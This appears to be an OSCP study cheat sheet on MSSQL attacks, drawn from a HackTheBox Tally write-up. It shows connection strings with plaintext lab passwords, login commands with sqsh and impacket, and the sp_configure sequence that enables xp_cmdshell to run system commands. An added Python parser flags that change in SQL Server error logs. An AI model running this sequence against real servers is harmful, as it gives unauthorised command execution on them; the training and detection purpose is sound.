OSCP 2022 Materials

MSSQL

SQL Server is a common service to find exposed to the outside world.

Requires: valid credentials. With them, commands can be executed on the victim.

Identifying Passwords

# from tally htb
SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;

# example format
PROVIDER=DNOSCPDB;DATA SOURCE=HOME;User ID=sa;PWD=cyb3rs3cn00b;DATABASE=rfdb

Connecting to server

# sqsh -S $ip -U sa -P $pass
sqsh -S 10.10.10.59 -U sa -P "GWE3V65#6KFH93@4GWTG2G"

# via impacket-mssqlclient
# -windows-auth is recommended when authenticating with a domain account; use the machine's NetBIOS name as the domain
impacket-mssqlclient -db orcharddb -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>

Code Execution

EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE; 
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE; 
go
xp_cmdshell 'whoami';
go

-- Check for linked servers
sp_linkedservers
go
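
Each `sp_configure` change in the sequence above is written to the SQL Server ERRORLOG as message 15457, so the sequence is easy to detect on the defender's side. The following is an added example, not part of the original notes: a small parser that flags when `show advanced options` or `xp_cmdshell` is switched on and reports the last value set. The sample log lines are constructed and the severity labels are assumptions.

```python
import re

# SQL Server writes message 15457 to ERRORLOG whenever sp_configure changes an option.
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<session>\S+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>-?\d+) to (?P<new>-?\d+)\."
)
# Options the sequence above switches on; severity labels are an assumption of this example.
WATCHED = {"show advanced options": "medium", "xp_cmdshell": "high"}

# Constructed sample ERRORLOG lines (not taken from a real server).
_TAIL = " Run the RECONFIGURE statement to install."
SAMPLE_LOG = [
    "2024-03-02 09:14:07.31 spid52      Configuration option 'show advanced options' changed from 0 to 1." + _TAIL,
    "2024-03-02 09:14:07.58 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1." + _TAIL,
    "2024-03-02 09:20:41.10 spid60      Configuration option 'max degree of parallelism' changed from 0 to 4." + _TAIL,
    "2024-03-02 09:31:12.77 spid52      Configuration option 'xp_cmdshell' changed from 1 to 0." + _TAIL,
]

def parse_changes(lines):
    """Yield (timestamp, session, option, old, new) for every config-change line."""
    for line in lines:
        m = CONFIG_CHANGE.match(line.strip())
        if m:
            yield m["ts"], m["session"], m["option"].lower(), int(m["old"]), int(m["new"])

def alerts(lines):
    """One alert per watched option that goes from 0 to a non-zero value."""
    return [
        {"time": ts, "session": session, "option": opt, "severity": WATCHED[opt]}
        for ts, session, opt, old, new in parse_changes(lines)
        if opt in WATCHED and old == 0 and new != 0
    ]

def final_state(lines, option="xp_cmdshell"):
    """Replay the log in order; return the last value set, or None if never changed."""
    state = None
    for _, _, opt, _, new in parse_changes(lines):
        if opt == option:
            state = new
    return state

if __name__ == "__main__":
    for alert in alerts(SAMPLE_LOG):
        print(alert)
    print("xp_cmdshell at end of log:", final_state(SAMPLE_LOG))
```
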

Last updated 2 years ago

https://ranakhalil101.medium.com/hack-the-box-tally-writeup-w-o-metasploit-b8bce0684ad3